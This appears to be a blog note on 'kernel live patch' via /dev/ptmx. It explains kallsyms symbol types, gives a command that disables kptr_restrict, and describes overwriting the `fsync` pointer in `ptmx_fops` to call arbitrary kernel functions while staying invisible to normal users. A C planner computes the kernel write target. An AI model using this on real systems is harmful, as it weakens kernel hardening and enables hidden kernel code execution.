# Notes on kernel live patch

###### tags: `blog`

## basis

- /dev/mem
- /dev/kmem
- /proc/iomem
- struct mm_struct init_mm
- swapper_pg_dir
- head.S
- https://www2.samsungknox.com/en/blog/real-time-kernel-protection-rkp
- kernel start address, page table address:
  - http://stackoverflow.com/questions/14460752/linux-kernel-arm-translation-table-base-ttb0-and-ttb1
  - http://stackoverflow.com/questions/16648112/arm-linux-kernel-page-table
  - DDI0333H_arm1176jzs_r0p7_trm.pdf

## /proc/kallsyms

If the addresses all show up as zeros (`kptr_restrict` is hiding them), first:

```shell=
echo 0 > /proc/sys/kernel/kptr_restrict
```

Meaning of the symbol type letter (uppercase means the symbol is global, i.e. visible outside its object; lowercase means local/static):

- b: symbol is in the uninitialized data section (BSS)
- c: common symbol, an uninitialized area
- d: symbol is in the initialized data section
- g: symbol for a small object in the initialized data section
- i: indirect symbol, one that refers to another symbol indirectly
- n: debugging symbol
- r: symbol is in the read-only data section
- s: symbol for a small object in the uninitialized data section
- t: symbol is in the text (code) section
- u: symbol is undefined

## ptmx_fops

The symbol `ptmx_fops` (corresponding to `/dev/ptmx`) is defined in `drivers/tty/pty.c`. It is a global that lies in the BSS segment, i.e. writable data rather than read-only text, which means that with root permission we can overwrite it safely.

`ptmx_fops` is a `file_operations` struct. Overwrite one of its function pointers (e.g. `fsync`) so that it points at some kernel function, and that kernel function can then be invoked through `/dev/ptmx`: `open("/dev/ptmx")` to get an `fd`, then `fsync(fd)`. Only the pointer slot you redirect changes; every other operation on `/dev/ptmx` keeps its original behaviour, so the patch is invisible to normal users of the device.
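The two steps above (resolving symbols from `/proc/kallsyms`, then targeting the `fsync` slot of `ptmx_fops`) as one added example. This is not code from the original note; it is a user-space planner that parses kallsyms text, detects addresses zeroed by `kptr_restrict`, refuses to proceed unless `ptmx_fops` really is a BSS symbol (`b`/`B`) and the target really is code (`t`/`T`), and computes the address/value pair that the kernel write (via `/dev/kmem` or whatever primitive you use) would need. The kallsyms listing is constructed, the target function and module names are placeholders, and `fsync_off` (the offset of `.fsync` inside `struct file_operations`) is a hypothetical value: on a real kernel read it from `pahole -C file_operations vmlinux` for that exact build. It does not perform any kernel write itself.

```c
/* kallsyms_plan.c: resolve the symbols for the ptmx_fops trick from
 * /proc/kallsyms text and sanity-check them before any kernel write.
 * Added example; the kallsyms listings below are constructed, not captured.
 * Build: cc -std=c99 -Wall -o kallsyms_plan kallsyms_plan.c */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct ksym {
    uint64_t addr;
    char type;          /* nm-style type letter; uppercase = global */
    char name[128];
};

/* Parse one "addr type name [module]" line; returns 1 on success. */
static int parse_line(const char *line, size_t len, struct ksym *out) {
    char buf[256], addr[32], name[128], type, *end;
    if (len >= sizeof buf) return 0;
    memcpy(buf, line, len);
    buf[len] = '\0';
    if (sscanf(buf, "%31s %c %127s", addr, &type, name) != 3) return 0;
    out->addr = strtoull(addr, &end, 16);
    if (*end != '\0') return 0;       /* address column was not hex */
    out->type = type;
    strcpy(out->name, name);
    return 1;
}

/* Look NAME up in kallsyms text.
 * 1 = found, 0 = not present, -1 = present but address is 0, which is what
 * kptr_restrict shows to readers it does not trust (echo 0 > kptr_restrict). */
int kallsyms_find(const char *text, const char *name, struct ksym *out) {
    const char *p = text;
    while (*p) {
        const char *eol = strchr(p, '\n');
        size_t len = eol ? (size_t)(eol - p) : strlen(p);
        struct ksym s;
        if (parse_line(p, len, &s) && strcmp(s.name, name) == 0) {
            if (out) *out = s;
            return s.addr == 0 ? -1 : 1;
        }
        if (!eol) break;
        p = eol + 1;
    }
    return 0;
}

struct patch_plan {
    uint64_t write_addr;    /* &ptmx_fops.fsync */
    uint64_t write_value;   /* address of the kernel function to install */
};

/* Build the plan. ptmx_fops must be a BSS symbol ('b'/'B'): on kernels that
 * mark it __ro_after_init it shows up as 'd'/'D' and a write there faults.
 * The target must be code ('t'/'T'). fsync_off is hypothetical here; take it
 * from `pahole -C file_operations vmlinux` for the real kernel build.
 * Returns 0 on success, negative error code otherwise. */
int plan_ptmx_patch(const char *kallsyms, const char *target,
                    size_t fsync_off, struct patch_plan *plan) {
    struct ksym fops, fn;
    int r = kallsyms_find(kallsyms, "ptmx_fops", &fops);
    if (r < 0) return -1;                                   /* addresses hidden */
    if (r == 0) return -2;                                  /* no ptmx_fops */
    if (tolower((unsigned char)fops.type) != 'b') return -3; /* not in BSS */
    r = kallsyms_find(kallsyms, target, &fn);
    if (r < 0) return -1;
    if (r == 0) return -4;                                  /* no such target */
    if (tolower((unsigned char)fn.type) != 't') return -5;   /* target is not code */
    plan->write_addr = fops.addr + fsync_off;
    plan->write_value = fn.addr;
    return 0;
}

/* Constructed sample of /proc/kallsyms (not captured from a real kernel). */
const char SAMPLE_KALLSYMS[] =
    "ffffffff81000000 T _text\n"
    "ffffffff8101a2b0 t do_sys_open\n"
    "ffffffff81234560 T kallsyms_lookup_name\n"
    "ffffffff82400000 D init_mm\n"
    "ffffffff82c0a000 B ptmx_fops\n"
    "ffffffffc0001000 t helper_fn\t[somemod]\n";   /* helper_fn/somemod: placeholders */

/* The same listing as an untrusted reader sees it with kptr_restrict=1. */
const char RESTRICTED_KALLSYMS[] =
    "0000000000000000 B ptmx_fops\n"
    "0000000000000000 T kallsyms_lookup_name\n";

int main(void) {
    struct patch_plan p;
    int r = plan_ptmx_patch(SAMPLE_KALLSYMS, "kallsyms_lookup_name", 0x58, &p);
    if (r != 0) { fprintf(stderr, "plan failed: %d\n", r); return 1; }
    printf("write %#llx into [%#llx]; then fd = open(\"/dev/ptmx\", O_RDWR); fsync(fd);\n",
           (unsigned long long)p.write_value, (unsigned long long)p.write_addr);
    return 0;
}
```

The negative return codes are deliberate: the failure you most often hit is `-1` (run the `kptr_restrict` command from the previous section, or read kallsyms as root), and `-3` is the one that saves you from faulting the kernel on a build where `ptmx_fops` is no longer plain BSS.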